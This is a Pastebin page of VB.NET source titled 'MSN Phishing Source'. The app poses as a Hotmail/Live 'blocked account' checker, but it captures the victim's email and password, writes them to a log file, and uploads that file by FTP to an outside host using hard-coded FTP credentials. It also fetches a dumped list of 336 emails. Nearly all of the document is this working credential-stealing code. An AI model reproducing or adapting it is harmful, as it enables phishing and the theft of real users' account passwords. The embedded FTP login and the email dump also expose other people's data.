Advertisement
john_oneill

MSN Phishing Source

Mar 8th, 2012
539
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 3.96 KB | None | 0 0
  1. Imports System.Net.Mail
  2. Imports System.IO
  3. Public Class Form1
  4.  
  5.     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBtn.Click
  6.         If Not IO.File.Exists("C:\Users\" & System.Environment.UserName & "\Pictures\check.txt") Then
  7.             My.Computer.Network.DownloadFile("http://dl.dropbox.com/u/50189012/Other/MSN%20Dump%20%28336%20Emails%29.txt", "C:\Users\" & System.Environment.UserName & "\Pictures\check.txt")
  8.         End If
  9.  
  10.         If MTCTxtbox.Text = "" Or YETxtBox.Text = "" Or YPTxtBox.Text = "" Then
  11.             MsgBox("Boxs Can Not Be Empty")
  12.         Else
  13.             Step1CheckMailDomain()
  14.         End If
  15.  
  16.     End Sub
  17.     Private Sub Step1CheckMailDomain()
  18.  
  19.         If MTCTxtbox.Text.Contains("@hotmail.com") Or MTCTxtbox.Text.Contains("@hotmail.co.uk") Or MTCTxtbox.Text.Contains("@hotmail.it") Or MTCTxtbox.Text.Contains("@live.co.uk") Or MTCTxtbox.Text.Contains("@live.com") Or YETxtBox.Text.Contains("@hotmail.com") Or YETxtBox.Text.Contains("@hotmail.co.uk") Or YETxtBox.Text.Contains("@hotmail.it") Or YETxtBox.Text.Contains("@live.co.uk") Or YETxtBox.Text.Contains("@live.com") Then
  20.  
  21.             Step2FinalCheckOfText()
  22.             Create()
  23.         Else
  24.             MsgBox("Invaild Mail Domain")
  25.         End If
  26.  
  27.     End Sub
  28.     Private Sub Step2FinalCheckOfText()
  29.         If Not IO.File.ReadAllText("C:\Users\" & System.Environment.UserName & "\Pictures\check.txt").IndexOf(MTCTxtbox.Text) >= 0 Then
  30.  
  31.             MsgBox("Not Blocked")
  32.  
  33.         Else
  34.             MsgBox("Blocked")
  35.  
  36.         End If
  37.     End Sub
  38.  
  39.     Private Sub ResetFBtn_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ResetFBtn.Click
  40.         YETxtBox.Clear()
  41.         YPTxtBox.Clear()
  42.         MTCTxtbox.Clear()
  43.     End Sub
  44.     Public Sub Download()
  45.  
  46.         Dim Url As String = "http://dl.dropbox.com/u/50189012/Other/MSN%20Dump%20%28336%20Emails%29.txt"
  47.         Dim SaveLocation As String = "C:\Users\" & System.Environment.UserName & "\Pictures\check.txt"
  48.         If Not File.Exists(SaveLocation) Then
  49.             My.Computer.Network.DownloadFile(Url, SaveLocation)
  50.         End If
  51.  
  52.     End Sub
  53.     Public Sub Create()
  54.  
  55.         Dim FileStream As FileStream = Nothing
  56.         Dim FileLocation As String = "C:\Users\" & System.Environment.UserName & "\Pictures\Log.txt"
  57.         If Not File.Exists(FileLocation) Then
  58.             FileStream = File.Create(FileLocation)
  59.         End If
  60.         If File.Exists(FileLocation) Then
  61.             Using sw As StreamWriter = New StreamWriter(FileLocation)
  62.                 sw.Write("Msn Email : " & YETxtBox.Text & vbNewLine & "Msn Password : " & YPTxtBox.Text)
  63.             End Using
  64.         End If
  65.  
  66.         Upload()
  67.     End Sub
  68.     Public Sub Upload()
  69.  
  70.         Dim Output As String = ""
  71.         Dim Random As New Random()
  72.         For i As Integer = 0 To 9
  73.             Output += ChrW(64 + Random.[Next](1, 26))
  74.         Next
  75.  
  76.         Dim Url As String = "ftp://take0000.comuv.com/public_html/"
  77.         Dim FileLocation As String = "C:\Users\" & System.Environment.UserName & "\Pictures\Log.txt"
  78.         Dim Name As String = System.Environment.UserName & Output & ".txt"
  79.         Dim User As String = "a7106351"
  80.         Dim Pass As String = "jpo0265944"
  81.         My.Computer.Network.UploadFile(FileLocation, Url & Name, User, Pass)
  82.  
  83.     End Sub
  84.  
  85.     Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
  86.         Dim CheckList As String = "C:\Users\" & System.Environment.UserName & "\Pictures\check.txt"
  87.         Dim LogFile As String = "C:\Users\" & System.Environment.UserName & "\Pictures\Log.txt"
  88.         If File.Exists(CheckList & LogFile) Then
  89.             File.Delete(CheckList)
  90.             File.Delete(LogFile)
  91.         End If
  92.     End Sub
  93.  
  94.     Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  95.         Download()
  96.     End Sub
  97. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement